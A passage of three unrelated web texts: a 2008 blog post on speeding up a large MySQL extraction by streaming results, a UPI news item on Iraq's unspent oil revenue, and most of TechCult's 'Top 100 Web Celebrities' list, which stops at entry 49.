Two of them are " core " tables and the other two are LEFT JOINed because they hold optional data for the rows I 'm pulling .
There are well over a hundred million records to consider and I need only about 10 - 15 % of them .
And these records fall into roughly 500 categories .
So what I 'd been doing is fetching a list of categories , running a query for each category to find the rows I actually need , processing the results , and writing them to disk for further processing .
The query looked something like this :
SELECT field1 , field2 , field3 , ... field N FROM stuff_meta sm , stuff s LEFT JOIN stuff_attributes sa ON sm.item_id = sa.item_id LEFT JOIN stuff_dates sd ON sm.item_id = sd.item_id WHERE sm.item_id = s.item_id AND sm.cat_id = ?
AND sm.status IN ( ' A ' , ' B ' , ' C ' )
That seemed , at least in theory , to be the obvious way to approach the problem .
But the idea of waiting several days for the results led me to think a bit more about it ( and to try some InnoDB tuning along the way ) .
While it seems very counter - intuitive , this was sticking in my head :
I�m still trying to get my head around this concept of " linear " data processing .
But I have found that I can do some things faster by reading sequentially through a batch of files rather than trying to stuff everything in a database ( RDF or SQL ) and doing big join queries .
So I gave it a try .
I wrote a new version of the code that eliminated the two AND bits in the WHERE clause .
Combining that with using mysql_use_result in the client API , meant it had to process a stream of many tens of millions of records , handle the status filtering and shorting records into buckets based on cat_id ( and some extra bookkeeping ) .
As an aside , I should note that there used to be an ORDER BY on that original query , but I abandoned that early on when I saw how much work MySQL was doing to sort the records .
While it made my code a bit easier , it was far more efficient to track things outside the database .
Anyway , the end result was that I was able to get all the data I needed in merely 8 hours .
In other words , treating MySQL as an SQL powered tape drive yielded a 12 fold improvement in performance .
Put another way , taking the brain - dead stupid , non-SQL , mainframe - like approach got me results 12 times faster than doing it the seemingly " correct " way .
Now this is n't exactly what the whole disk vs. tape thing is about but it 's pretty close .
I 'm aware that InnoDB works with pages ( that will contain multiple records , some of which I do n't need ) and that 's part of the problem in this scenario .
But it 's a really interesting data point .
And it 's certainly going to change my thinking about working with our data in the future .
Actually , it already has . :-)
Dumber is faster .
As I 've mentioned before , craigslist is hiring .
We like good Perl / MySQL hackers .
And good sysadmin and network types too .
Ping me if you 're interested in either role .
Posted by jzawodn at August 21 , 2008 02:21 PM
Chairman of the Senate Armed Services Committee Carl Levin ( D - MI ) speaks at a press conference on the National Defense Authorization Act , which funds the Department of Defense and other national security programs , in Washington on December 7 , 2007 .
( UPI Photo / Alexis C. Glenn ) | License Photo
WASHINGTON , Aug. 6 ( UPI ) -- Revelations that Iraq has banked $ 79 billion in unspent oil revenues instead of using the funds on reconstruction is " inexcusable , " two U.S. senators say .
Sens. Carl Levin , D - Mich. , and John Warner , R - Va. , said Tuesday it is unfair for the United States to fund Iraqi reconstruction projects when an investigation found , among other things , that Iraq has spent only $ 3.9 billion on critical infrastructure while U.S. taxpayers have contributed $ 23.2 billion since 2003 , The New York Times reported .
Advertisement
" The Iraqi government now has tens of billions of dollars at its disposal to fund large - scale reconstruction projects , " the senators said in a joint statement .
" It is inexcusable for U.S. taxpayers to continue to foot the bill for projects the Iraqis are fully capable of funding themselves . "
Other items revealed in the General Accounting Office report on Iraq include revelations that Iraq spent 28 percent of its $ 12 billion reconstruction budget , with $ 2 billion of the spending taking place in the relatively peaceful Kurdish region ; and that from 2005 - 07 , Iraq spent only 1 percent of its operating budget to maintaining reconstruction projects that had been built with either U.S. or Iraqi money , the Times reported .
TechCult ’s Top 100 Web Celebrities
As the web goes mainstream , a brand new group of celebrities is emerging .
The 100 people you will find below are shaping the future of the Internet ( most for the better , some for the worse … ) , and as a consequence they are right under the spot light .
We gathered around 200 potential names and queried them on Google to see how many results they would generate .
Some minor adjustments were made , and the 100 names with the highest number of results were profiled ( as you can see it is not our fault that Chris Crocker ended at the 6th position ! )
Celebrities that became famous prior to the explosion of the Web were not included .
Hence you will not find the likes of Steve Jobs or Bill Gates , despite our acknowledge that they are also influencing the Internet .
100 . Alex Tew
College can be expensive , and students can be incredibly imaginative ; put the two together and you will come up with some pretty unusual methods of earning tuition money .
That ’s exactly what Alex Tew did to create his Million Dollar Homepage project .
Starting in August , 2005 , Tew began selling blocks of pixels on his page .
Buyers could use the space for advertising or whatever they wished .
Word of the project spread and soon Tew was getting coverage in mainstream magazines .
After a month , he had sold over $ 150,000 worth of space and by January , 2006 , he had exceeded the one million dollar mark .
99 . David Sifry
David Sifry is known primarily for having founded Technorati , a search engine that indexes over 100 million blogs ( 112.8 million blogs and 250 million pieces of tagged social media as of May 22 , 2008 ) .
In addition , Technorati tracks blog traffic and link stats , and its ranking system can mean bragging rights for sites ( called the Technorati Top 100 ) .
Silfry is an Open Source proponent , and is a frequent speaker on the subjects of web technology , wireless and blogging .
In addition , he ’s frequently interviewed or quoted in tech and business magazines , including The Guardian and The Economist .
98 . Richard MacManus
Richard MacManus is the founder of Read / WriteWeb , a blog about technology issues and Web 2.0 developments that has been rated as one of the world ’s 50 most popular blogs ( by Technorati ) .
The blog also generates over 600,000 page views every month , and has around 220,000 RSS subscribers .
The impact of MacManus ’ writing and Read / WriteWeb has been recognized by PC Magazine and other mainstream publications .
Prior to his blogging career , MacManus was a researcher , analyst and author , writing for ZDNet ; he still consults for various technology companies , primarily those based in Silicon Valley .
97 . Jeff Atwood
Jeff Atwood ’s blog CodingHorror.com is a popular choice for those interested in web development and software programming in general .
Atwood ’s site is full of tips and commentary on how not to code , as well as programming advice .
Online since 2004 , Atwood has a dedicated audience ( over 60,000 RSS subscribers ) and significant site traffic , estimated at over half a million unique visitors per month .
Jeff Atwood has recently joined up with Joel On Software Spolsky to create a new programming resource site , stackoverflow.com , currently under development .
96 . Amanda Congdon
Amanda Congdon is best known as the popular anchor , co-producer and co-owner of Rocketboom , one of the most widely viewed video blogs on the web .
She stayed with the show from 2004 through 2006 .
Beginning with 700 viewers when she was hired by founder Andrew Michael Baron , Congdon grew Rocketboom ’s audience for the three minute video clips to a reported 130,000 viewers per day .
Congdon left Rocketboom in July of 2006 under controversial circumstances : she said she had been fired by Baron , while Baron ’s claimed she left for showbiz opportunities .
Congdon has since made a number of guest appearance on TV shows and participated in other web - based projects , including the blog AmandaAcrossAmerica.com .
She blogs and lists her current projects at AmandaCongdon.com .
95 . Drew Curtis
Fark.com , started in 1999 by Drew Curtis , is a social news aggregator web site .
Fark readers submit links to interesting ( and / or controversial ) items from other web sites and Fark administrators choose whether to promote these to the Fark.com front page ; the items are tagged so they can be divided into related forums .
Readers comment on the stories and the traffic directed to linked pages from the Fark.com front page has been known to crash those sites ’ servers due to excessive load ; an effect known as being “ farked . ”
Curtis ’ first book ,
It ’s Not News , It ’s FARK : How Mass Media Tries To Pass Off Crap As News was published in 2007 .
94 . Bob Parsons
Bob Parsons ’ original involvement in the technology field was as the creator of MoneyCounts , a home accounting software package that he released in 1984 .
After diversifying into religious software ( Bible - searching , Christian clip art , etc… ) , he sold his company to Intuit in 1994 .
Parsons turned to the Internet and in 1997 founded Go Daddy , an Internet registrar and web - hosting firm .
With three registrars under the company umbrella , including GoDaddy.com , Go Daddy is by far the dominant player in the industry , and the largest ICANN - accredited registrar .
Go Daddy has become a player in the ongoing evolution of Internet policies , to the point of becoming involved in political lobbying with the US government .
93 . Judson Laipply
A comedian and motivational speaker , Judson Laipply posted a video on YouTube in 2006 , looking for his fifteen minutes of Internet fame .
As it turned out , that video , The Evolution of Dance , was forwarded everywhere and became the most popular video on YouTube : most viewed of all time and most commented of all time .
As of May , 2008 , it has been viewed nearly 86 million times and nearly 160,000 people have left comments .
Of course it has also spawned a series of imitators and send - ups .
Laipply keeps the video front and center on his web site , The Evolution of Dance , which has become a commercial portal offering EOD shirts and motivational speaking bookings by Laipply .
92 . Mitchell Baker
Mitchell Baker ”s title inside the Mozilla Foundation is quite unique : Chief Lizard Wrangler .
Translated it should mean Chairperson .
She runs the business side of both the Mozilla Foundation and the Mozilla Corporation ( the subsidiary ) , and she is also responsible for the vision that the organization is pursuing .
Back in 1994 Baker was already involved with Netscape Communications , where she was in charge of the intellectual property protection department .
Given the enormous importance that the Mozilla Foundation is taking in recent years , Baker was included in the Time ”s 100 most important people in the world list ( 2005 ) .
You can read more about her opinions and the inside activities of Mozilla on her personal blog .
91 . Mark Frauenfelder
Mark Frauenfelder is someone who successfully plays in both print and web media , apart from being a talented illustrator .
Frauenfelder is probably best known on the web as the co-founder of the blog Boing Boing , based on bOING bOING magazine , which he also co-founded .
He ’s been a print columnist with a wide range of publications , including Playboy , The New York Times Magazine and Wired ( where he was an editor for 5 years ) .
He is currently Editor - In - Chief of Make magazine .
Frauenfelder wrote and illustrated a science book aimed at kids called The Mad Professor , and recently released the book Rule The Web : How To Do Anything And Everything on the Internet - Better , Faster , Easier .
90 . Sarah Lacy
Sarah lacy is a bi-weekly columnist for Business Week magazine and the co-author of that magazine ’s Kevin Rose cover story .
She also co-hosts Yahoo’s Tech Ticker web show .
Lacy can be a bit of a target –her good look have earned resentment on some fronts , despite ten years of tech industry reporting - and at the SXSW conference in 2008 , things came to a head when the audience turned on her while she interviewed FaceBook CEO Mark Zuckerberg on stage .
Lacy ’s book Once You ’re Lucky , Twice You ’re Good : The Rebirth of Silicon Valley and the Rise of Web 2.0 was released in May , 2008 .
She blogs regularly at Sarah Lacy.com .
89 . Jason Kottke
Jason Kottke is a long - time blogger , “ Bloggie ” Lifetime Achievement award winner and former web designer .
Kottke ’s design work has been recognized in The New York Times and Forbes and a font he designed ( silkscreen typeface ) has been used by Volvo , MTV and Adobe .
He began blogging in 1998 and kept at it , with a 2000 profile in the New Yorker helping to introduce the idea of blogging to the general public .
2004 saw a rough patch when Kottke ’s blog , kottke.org , broke the news of Ken Jennings ’
Jeopardy loss , including the question he answered incorrectly – the network was not amused .
In 2005 , Kottke experimented with asking readers to make donations to support his blog , reporting that 1450 micro-patrons had contributed nearly $ 40,000 .
88 . Xeni Jardin
Xeni Jardin is a blogger and somewhat of a technology and digital culture media personality , making frequent appearances on Internet celebrity lists .
She holds the high profile position of co-editor at the blog Boing Boing , and contributes material to Wired , wired.com , Make , Popular Science , Playboy , and editorial pieces for the New York Times and Los Angeles Times .
She is a correspondent for NPR radio show Day to Day and has put in guest appearances as a technology commentator on ABC , CNN , Fox , G4TechTV and BBC5 radio .
Jardin also appears as the co-host of Boing Boing ’s daily web - based video show BoingBoingtv .
87 . Ryan Block
As Editor - in - Chief of technology blog Engadget , Ryan Block has considerable influence in how computer , home electronic and technology - related products in general are received .
To gain some perspective of how much influence a leading technology blog can have , consider that a 2007 Engadget post by Block about a possible iPhone and OSX release delay , based on a faked Apple e-mail , drove down Apple ’s share price by 2.2 % within a matter of minutes .
Block is a frequent guest on tech - related shows , including appearances on Cranky Geeks , CNET , Attack of the Show and others .
Block is currently involved in a relationship with popular web media personality Veronica Belmont , a fact he mentions frequently on his personal blog .
86 . Markos Moulitsas
Markos “ kos ” Moulitsas is an author and blogger .
He founded and is the main author of the well - known political commentary blog Daily Kos .
With a membership of over 125,000 registered readers and postings by prominent Democratic political figures including Jimmy Carter , John Kerry and Nancy Pelosi , Daily Kos currently attracts 600,000 daily visitors .
Moulitsas parlayed his web prominence into a regular Newsweek column and has co-authored the book Crashing the Gate : Netroots , Grassroots , and the Rise of People - Powered Politics .
He placed third in a Forbe ’s list of web celebrities and ranked 26th in a PC Magazine list of the Most Important People on the Web .
85 . Janus Friis
A self - described “ disruptive Internet entrepreneur , ” Janus Friis is the co-founder ( with Niklas Zennstrom ) of the Peer - to - Peer ( P2P ) KaZaA network and went on with Zennstrom to co-found Internet telephony company Skype , investment company Atomico and P2P video distribution system Joost .
Along with Zennstrom , Friis is considered to be behind many of the most significant technological shifts on the Internet and has been named to lists of important contributors compiled by cnn.com and Time magazine .
Friis blogs occasionally at janusfriis .
net and is frequently profiled in both online and print media .
84 . Jack Ma
Jack Ma was one of the first Chinese to realize the potential of the Web .
As soon as he managed to grab an Internet connection , he started building websites for Chinese companies .
In 1999 he hit a home run founding Alibaba.com .
The site works as a business to business marketplace , and it became successful in connecting foreign companies to Chinese ones .
The popularity of the website grew so much that in 2005 Yahoo !
decided to purchase 40 % of it , offering in exchange US $ 1 billion plus the assets of Yahoo !
China .
In November of 2007 Alibaba.com was listed on the Hong Kong Stock Exchange , raising a total of US $ 1.5 billion .
It was the second largest IPO for an Internet company , after Google .
83 . Bram Cohen
The motion picture industry watched the havoc that Napster and other sharing networks wreaked on the music business and realized the same thing could happen to them when technology and bandwidth caught up to the much larger video file sizes .
Bram Cohen co-founded BitTorrent in 2002 and the game was on .
Cohen ’s BitTorrent protocol facilitates distribution of large files by breaking them into smaller pieces , with multiple recipients and sharers all swapping file bits instead of a single host server distributing an entire file .
From a copyright enforcement perspective , BitTorrent means tracking and shutting down a single file uploader has little or no impact on file availability .
82 . Philip Rosedale
Philip Rosedale ( also known by his Second Life avatar ’s name Philip Linden ) is the founder and CEO of Linden Lab , creator of virtual world Second Life .
Second Life claims to have over 2 million subscribers and has become an important point of contact for real - life personalities and organizations that establish a Second Life presence to interact with subscribers .
With the runaway success of Second life , Rosedale ’s contribution to online society has been noted in Business 2.0 , USA Today and Time magazine .
Rosedale ’s career prior to founding Linden Labs includes serving as Vice President and CTO at RealNetworks , where he launched a series of computer media products including RealVideo .
81 . Steve Pavlina
The founder , CEO and software developer for award winning shareware game company Dexterity Software , Steve Pavlina was originally known for developing engaging computer games and for his work on behalf of the Association of Shareware Professionals ( ASP ) .
In 2006 , Pavlina turned from game development to his blog on personal development , StevePavlina.com .
On his site , Pavlina describes himself as “ perhaps the most intensely growth - oriented individual you will ever meet , ” and claims his site to be the world ’s most popular personal development site , with over 1.8 million visitors per month .
In a 2007 interview , Pavlina notes that his blogging generates nearly $ 40,000 per month in earnings .
80 . Gina Trapani
Gina Trapani is a tech writer , author and freelance web developer .
Her most visible role is as Lead Editor for Gawker Media ’s personal productivity blog Lifehacker , a role that has also spawned the books Upgrade Your Life : The Lifehacker Guide to Working Smarter , Faster , Better and Lifehacker : 88 Tricks to Turbocharge Your Day .
Lifehacker is one of the most popular blogs on the web , with its 2006 readership estimated at 7 million page views per month and over 100,000 RSS subscribers ; Lifehacker has received accolades from CNET , Wired , Time and others .
Articles written by Trapani have appeared in prominent publications , including Wired , Popular Science , PC World and MacWorld , and she has been profiled by the likes of The Wall Street Journal .
79 . Anil Dash
An early blogger , Anil Dash is Vice President and Chief Evangelist for blogging software giant Six Apart .
This position involves helping popularize blogging through appearances at various events and promoting Six Apart products , including Movable Type and TypePad .
Dash gained some public notice by winning a 2004 contest to take the top position in a Google search for the term “ nigritude ultramarine ” ; while many competitors resorted to extreme search optimization methods , Dash simply posted a blog post on the subject and asked readers to link to his post .
His writing on web culture has been featured in Wired and the Washington Post and he has appeared as a guest on a variety of shows .
Anil Dash blogs at dashes.com .
78 . Brad Fitzpatrick
A software engineer , Fitzpatrick ( or bradfitz ) is best known as the creator of LiveJournal , a blogging virtual community with accompanying Open Source server software ; part of his Danga Interactive company , which he sold to blogging software company Six Apart in 2005 .
Fitzpatrick took the position of Chief Architect with Six Apart , but left the company in 2007 for a position with Google .
A supporter of the Open Source movement , Fitzpatrick is responsible for the development of other projects including MogileFS , Djabberd and Perlbal .
Fitzpatrick ’s web site bradfitz.com serves as a central hub for his presence on the web , including FaceBook , MySpace and Twitter pages .
77 . Veronica Belmont
Veronica Belmont is a journalist , media personality and host or co-host of a slew of technology industry - themed podcasts , shows and videos .
She was also named to a Sexiest Geek list .
Belmont originally joined CNET as a producer and sound engineer , but soon grew beyond her background role and began making appearances , eventually co-hosting CNET podcasts including MP3 Insider and CRAVE Gadget Blog .
Leaving CNET for Mahalo in 2007 , she hosted her own video show , Malaho Daily .
In 2008 , she left Malaho for Revision3 , where she is now co-host of Tekzilla .
Besides her full - time gigs , Belmont has been in high demand as a guest on other shows and podcasts , putting in dozens of appearances over the past several years .
76 . Matt Mullenweg
One of the individuals who has been quietly enabling and strengthening the presence of blogging since 2002 , Matt Mullenweg has been involved with a host of blogging services , tools and software companies , and has been at the forefront of a battle to curb splogs ( computer generated blog comments that link to fake , advertising blogs ) .
He was a co-founder of WordPress , The Global Multimedia Protocols Group , Akismet ( a splog - blocking service ) , worked for CNET , and most recently , co-founded the company Automattic .
Mullenweg was named to PC World ’s 50 Most Important People on the Web list in 2007 .
His blog can be read at ma.tt .
75 . Darren Rowse
Darren Rowse has proved that bloggers can be successful not only from a readership perspective , but also financially .
ProBlogger and Digital Photography School , his digital photography site , are estimated to generate over 50,000 page views per day between them and generate in excess of $ 20,000 per month in advertising revenue .
ProBlogger , which offers blogging tips and advice , is often cited as one of the web ’s top blogs .
Rowse outlined his methods as co-author of the book ProBlogger : Secrets For Blogging Your Way To A Six -Figure Income , as well as teaching a similarly - themed course .
Rowse is also co-founder and VP of Blogger Training for blog network b5 media .
74 . Ze Frank
Hosea Jan Frank ( aka Ze Frank ) , is performance artist , famous for his year - long , The Show With Ze Frank , daily video blog .
Frank gained recognition in 2001 , when “ How To Dance Properly , ” created as a party invitation for his friends , became a runaway viral video , generating millions of hits .
The Show With Ze Frank received thousands of visitors daily and featured a Friday segment where Frank performed routines scripted by viewers via a wiki .
Frank was recognized with a 2002 “ webby ” award and recognition for The Show at the 2007 SXSW festival .
He ’s received coverage in the mainstream media and multiple invitations to speak at the TED conference .
Frank ’s blog , zefrank.com remains a popular site for his humorous commentary and impressive collection of links to online games , videos and time wasters .
73 . Merlin Mann
Writer and productivity guru Merlin Mann has carved a niche for himself as a motivational “ productivity ” speaker and a dispenser of advice through his popular 43 Folders site .
Concentrating on personal productivity and “ life hacks , ” 43 Folders draws an estimated 2.5 million unique visitors per year and its RSS feed is downloaded 100,000 times daily .
Mann has written articles for technology and cultural publications including Make , Wired , MacWorld and Popular Science and contributes to productivity and Mac- oriented podcasts .
His productivity talks appeal to the technology crowd and he ’s been a featured speaker and influential companies such as Apple , Yahoo ! and Google . ( Photo by Graham )
72 . John C. Dvorak
John Dvorak is probably responsible for instigating more Mac vs.
Windows flame wars than any other pundit thanks to years of inflammatory and generally anti-Mac posts .
Dvorak has been a force in technology and computer commentary for decades , including stints as Editor at Infoworld ; columns with Forbes , MacUser , PC World ; and his current column at PC Magazine .
He has also authored a dozen books and written for numerous newspapers .
His personal blog still hits on technology - themed topics , but he also picks up on pop culture and general interest stories .
Besides his writing gigs , Dvorak contributes to a number of video podcasts including Cranky Geeks and This Week in Tech ( which claims 500,000 listeners ) , hosted Silicon Spin on TechTV and is a frequent technology commentator on CNBC .
71 . Steve Rubel
Steve Rubel is a Public Relations expert ( or “ digital marketer , ” as he describes himself ) and an evangelist for using corporate blogs as an effective PR medium .
His own blog , Micro Persuasion , was launched in 2004 and offers thoughts and advice about technology ’s impact on business , culture , media and marketing .
Rubel gained some public attention with the Wal - Marting Across America blog , which followed a couple who drove an RV across the US , parking the vehicle overnight in Wal - Mart parking lots .
Rubel is currently SVP , Director of Insights for Edelman Digital and his successful leverage of coporate blogging has led to recognition in technology and business - related media , including Forbes.com , PC Magazine and Media Magazine .
70 . Nick Denton
In the blogsphere , there are a multitude of personal blogs , corporate blogs and there are the blogs belonging to a parent media group .
Gawker Media , founded and owned by Nick Denton , is one of those umbrella online media organizations and its stable of blogs include some of the most popular on the web : Gizmodo , io9 , Consumerist , Lifehacker , and Gawker , among others .
Denton took over as the Managing Editor of flagship blog Gawker.com in 2008 , following a tumultuous year that saw multiple editors leave .
Gawker , which is a New York entertainment and culture - focused blog , has also seen controversy over its “ Gawker Stalker ” feature , a GoogleMaps mashup that plots the location of celebrities as spotted and reported by Gawker readers .
69 . Craig Newmark
Craig Newmark dealt many publications a knock - out punch with the launch of his Craigslist web site .
While traditional newspapers rely on classified advertising as a major source of revenue , Craiglist allows users to post ads for free , charging only for job postings .
With a presence in most major cities in the US and significant worldwide growth , Craigslist has become the market leader in classified advertising and one of the highest traffic web sites in the world ( reportedly 9 billion page views per month ) .
eBay purchased a stake in Craigslist in 2004 , but the two companies engaged in legal action against each other in 2008 , trading accusations over unfair competition .
Newark is an advocate of keeping web services free , remains active in the day to day operations of Craigslist and blogs regularly .
68 . Niklas Zennstrom
Niklas Zennstrom is a leader in the field of Peer - to - Peer ( P2P ) web technologies .
His first major venture was as co-founder of the KaZaA ( or kaazaa ) Network , a technology which had significant impact on enabling the file sharing ( especially of MP3s ) that had become one of the Internet ’s big things ; the company attracted its fair share of copyright - related lawsuits .
Zennstrom is also co-founder of Internet telephony company Skype , which was purchased in 2005 for over $ 2.5 billion by eBay .
Zennstrom is now involved in his latest start - up , Joost , an advertising - supported P2P video distribution system for which Zennstrom has been negotiating content deals with numerous entertainment companies , including MTV , Paramount , CBS and the National Hockey League .
67 . Meg Whitman
Meg Whitman was the President and CEO of eBay from March 1998 to March 2008 .
Under her command , the online auctions website managed to maintain its leadership , despite the attack of other Internet companies like Amazon and Yahoo !.
Whitman also contributed to the successful acquisition of PayPal in 2003 , and to the somewhat successful acquisition of Skype in 2005 .
Her networth is estimated at over US $ 1 billion , and she made it to the Time ”s 100 most important people list on several years .
66 . Steve Gibson
The Internet is full of shadowy figures who constantly test the vulnerability of sites and data .
Steve Gibson is an expert on these people , the system hackers and software crackers .
He is a Contributing Editor to InfoWorld magazine and founder of Gibson Research Corporation ( GRC ) , a software development firm that develops specialized tools for data recovery and Internet security .
Gibson ’s OptOut software , released in 2000 , was one of the first adware removal programs .
He has appeared frequently on tech - based podcasts and TV shows with Leo Laporte , including co-hosting the Security Now ! podcast .
Some of Gibson ’s claims about computer and system security vulnerabilities have been downplayed by other experts , with occasional accusations that Gibson may have been inflating their significance .
65 . Jeffrey Zeldman
Jeffrey Zeldman was on the web scene early in the game , and has been posting about web design since 1995 , most notably on A List Apart .
Zeldman was an early proponent of a standards - based , cross browser approach to web design and through the Web Standards Project ( which he co-founded ) , helped to pressure Microsoft and Netscape into supporting standards in their browsers .
His lectures and books have helped to increase awareness of standards and to train a generation of web designers , contributing to an improved web browsing experience for everyone .
Zeldman ’s blog , The Daily Report is a good read for his commentary on web design and technology topics .
64 . Mitch Kapor
As co-founder , President and CEO of Lotus development Corp. , Mitchell Kapor was one of the people who helped make the personal computer an integral part of the business office .
In 1983 , he created Lotus 1 - 2 - 3 , the dominant spreadsheet software that rapidly made Lotus one of the world ’s biggest software companies .
Kapor ’s sphere of influence spread to the Internet .
He was a co-founder of digital right organization the Electronic Frontier Foundation ( EFF ) , serving as its Chairman until 1994 .
He has chaired the Mozilla Foundation and belongs to the Advisory Board for the Wikipedia Foundation .
His web site includes lists of his current projects as well as an archive of his articles and publications ; he shut down his blog in 2006 .
63 . Steve Case
Steve Case is a web pioneer and philanthropist .
Case was co-founder , Chairman and CEO of America Online ( AOL ) , once the world ’s largest Internet company and the gateway to e-mail and web access used by millions of subscribers .
After AOL merged with Time Warner in 2001 , Chase became chairman of the new company AOL Time Warner , stepping down in 2003 .
The merger came at the height of the dot - com meltdown as well as dwindling AOL influence and has generally been considered a disappointment .
Case has turned much of his attention to philanthropic causes through his Case Foundation organization , although his 2005 start - up , Revolution ( primarily heath care and wellness - focused ) , shows he is still active in the business world .
62 . Nicholas Carr
Nicholas Carr is a writer and scholar who has raised waves in the technology and Web 2.0 worlds with his pointed criticism ; a 2007 Wired article referred to him as “ high tech ’s Captain Buzzkill . ”
Carr uses his blog Rough Type to reach out to a wide audience , posting his thoughts on IT service as a standardized commodity , the risk of volunteer Web 2.0 efforts ( Wikipedia being a favorite target ) supplanting higher quality , “ professional ” versions and his fear of Google ’s influence on future culture .
A former Executive Editor with The Harvard Business Review , Carr ’s books include Does IT Matter ?
Information Technology and the Corrosion of Competitive Advantage and The Big Switch : Rewiring the World , From Edison to Google .
61 . Marissa Mayer
Marissa Mayer is the Vice President of Search Product & User Experience at Google , Inc .
She has led the product management group through a number of key product releases , including Google Earth and Google Desktop and it is her responsibility to decide which incubating projects should be brought to the attention of Google ’s founders and when products are ready for public introduction .
Mayer tends to be one of Google ’s most visible executives , since product launches typically involve appearances at conferences and media interviews .
One of Google ’s first 20 employees and their first female software engineer , Mayer has been profiled in publications such as Red Herring , Business Week , Fortune and Business 2.0 .
60 . Frank Warren
Frank Warren ’s claim to fame is the weblog phenomena PostSecret .
Warren started his online PostSecret project as an experimental blog that asked readers to send in a postcard which they were to decorate themselves on one side , and write a secret they have never revealed previously on the other .
Warren then displayed the postcards .
PostSecret was unique in that it was n’t a blog in the traditional sense , but more a social experiment / viral art project .
Comments were n’t even enabled on the blog until two years after it launched .
The success of PostSecret brought it media attention , a collection of “ bloggies ” in the 2006 and 2007 Weblog Awards and led to the publication of four related books , including A Lifetime of Secrets : A PostSecret Book , released in 2007 .
59 . Clay Shirky
Clay Shirky is an author , professor and consultant who specializes in the social and economic impacts of Internet technologies , including the rise of decentralized ( e.g. wireless ) services .
Shirky ’s columns about the world wide web have appeared in a wide range of influential publications , including The Wall Street Journal , Wired , Computerworld and The Harvard Business Review .
He is a frequent interview subject and conference speaker on web culture and was a guest on The Colbert Report .
Shirky.com , his blog , is a source of frequent posts about subjects of interest , including P2P ( peer to peer ) , Open Source and social networking .
Shirky ’s most recent book , Here Comes Everybody : The Power of Organizing Without Organizations was released in 2008 .
58 . Joi Ito
Joi Ito is a noted technology columnist , venture capitalist and an influential proponent of social networking technologies .
Based in Japan , Ito has written for a long list of publications , including the New York Times , Mac World Japan and Wired .
As a venture capitalist , he was an investor in emerging social networking and blogging sites , including Flickr , Six Apart , Technorati and SocialText .
Ito is currently the CEO of Creative Commons , and has served on the Board of Directors for other governing bodies including ICANN , the Mozilla Foundation and the Open Source Initiative ( OSI ) .
An active participant in Web 2.0 culture , Ito is a presence on many social networking sites as well as posting regularly to his blog at joi.ito.com .
57 . Joel Spolsky
Starting his programming career at Microsoft , Joel Spolsky left in 2000 to co-found Fog Creek Software ( producer of FogBugz ) , a company that focused as much on ensuring that its operations remain software development - focused rather than marketing dominated as it did on growth .
The company remains successful and Spolsky credits this to keeping Softcreek a company that is attractive to software developers .
Spolsky ’s opinions of software development and the management ( or mis-management ) of software and technology companies on his blog joelonsoftware struck a nerve with software engineers and employees of technology - focused companies worldwide and they have made his posts a must - read .
He has also written a handful of books , including Smart and Gets Things Done : Joel Spolsky ”s Concise Guide to Finding the Best Technical Talent .
56 . David Filo
David Filo co-founded Yahoo ! in 1995 with partner Jerry Wang .
While Wang went on to become CEO , Filo ’s responsibility as “ Chief Yahoo ” is to direct technical operations of the Yahoo ! web sites .
Filo ’s teams provide much of Yahoo ! ’s revenues , through innovations such as push advertising , banners bars and button ads as well as holding considerable influence over platform , infrastructure and architecture .
Together with Yang , Filo remains one of the most public faces of the Yahoo !
management team , although he tends to stay in the background where possible .
Naturally , as a co-founder of Yahoo ! , Filo is a billionaire , profiled frequently in technology publications and is in demand to speak at web and technology conferences .
55 . Chad Hurley
Chad Hurley is the graphic designer and user interface expert who designed PayPal ’s logo .
While working at PayPal , he met several associates ( Steve Chen and Jawed Karim ) and the three of them eventually left to form online video hosting site YouTube .
As CEO of YouTube , Hurley was largely responsible for its tremendous growth and oversaw the sale of his company to Google in 2006 for $ 1.65 billion .
Hurley has been the subject of numerous technology stories , including stories in The Wall Street Journal , Newsweek , Time and Business 2.0 ( which included him on its 50 People Who Matter Now list ) .
54 . Marc Andreessen
Few people can claim to have had the impact on the early development of the world wide web that Marc Andreessen has .
He was co-author of Mosaic , the first widely - adopted web browser ( and which was used as the basis for Microsoft ’s Internet Explorer browser ) .
Andreessen went on to co-found Netscape Communications , which promoted its own Netscape Navigator web browser .
Although Netscape initially had the upper hand over Microsoft ’s , that situation eventually reversed with Microsoft ’s Internet Explorer becoming the dominant browser in use today .
Andreessen left Netscape shortly after it was sold to AOL in 1999 and currently invests in start - up companies like Digg , Plazes , Twitter and social network platform Ning , frequently posting about his ventures on his blog .
53 . Brian Lam
Gizmodo , part of the Gawker Media network , is one of the top gadget blogs on the web ; it ’s currently engaged in a bitter rivalry with Engadget , a competing site created by a former Gizmodo editor .
Brian Lam is Editor - In - Chief at Gizmodo and he ’s steering it through an interesting transition involving the struggle between cool and from the hip blogging versus old school journalism .
At the same time that Gizmodo is making headway in a struggle to compete against traditional media for access to interview subjects and trade shows , Gizmodo staff are still pulling pranks ( for example , turning off exhibitors ’ display monitors via a remote control at the 2008 CES show ) that result in organizers banning them and other media dismissing them as “ real ” journalists .
52 . Adam Curry
Adam Curry is a media crossover star who first gained fame as a veejay on MTV , hosting Headbangers Ball and Top 20 Countdown .
After MTV , he moved into the relatively new realm of web entrepreneurship , co-founding the site OnRamp , which was sold to THINK ( with Curry remaining on as CTO ) .
His biggest claim to fame is being among the first to recognize the potential in podcasting .
He produces Daily Source Code , one of the first ( and longest running at over 750 episodes ) podcasts and has been referred to at times as the “ Podfather . ”
He continues to promote his podcasting ventures through conferences , radio shows and even in the virtual world , Second Life .
51 . Terry Semel
A long - serving executive with Time Warner , Terry Semel left to become Chairman and CEO of Yahoo !
Inc .
His tenure at Yahoo ! was considered by many people to have hurt the company and he resigned after 6 years .
Among the low points of Semel ’s reign were a failed negotiation to purchase Google before that company rose to market dominance , his approval to release Yahoo !
User information to the Chinese government for the purpose of prosecuting dissidents and a compensation package that netted him well over half a billion dollars over his term during a time when Yahoo ! was felt by investors to have seriously underperformed .
50 . Steve Chen
Talk about being on the leading edge , Steve Chen has managed to be involved with three of the web ’s hottest companies just as they began to take off , one of them as a co-founder .
An employee of PayPal and FaceBook , he and several co-workers left to start online video sharing site YouTube .
Chen remains Chief Technology Officer of YouTube , which he and his partners sold to Google in 2006 for $ 1.65 billion .
As a YouTube co-founder , Chen has changed the way media is distributed and viewed and was named to the 2007 Time 100 List and Business 2.0 ’s list of 50 People Who Matter Now .
49 . John Chow
John Chow has managed to become one of the most controversial figures in blogging , thanks to his web site Johnchow.com .
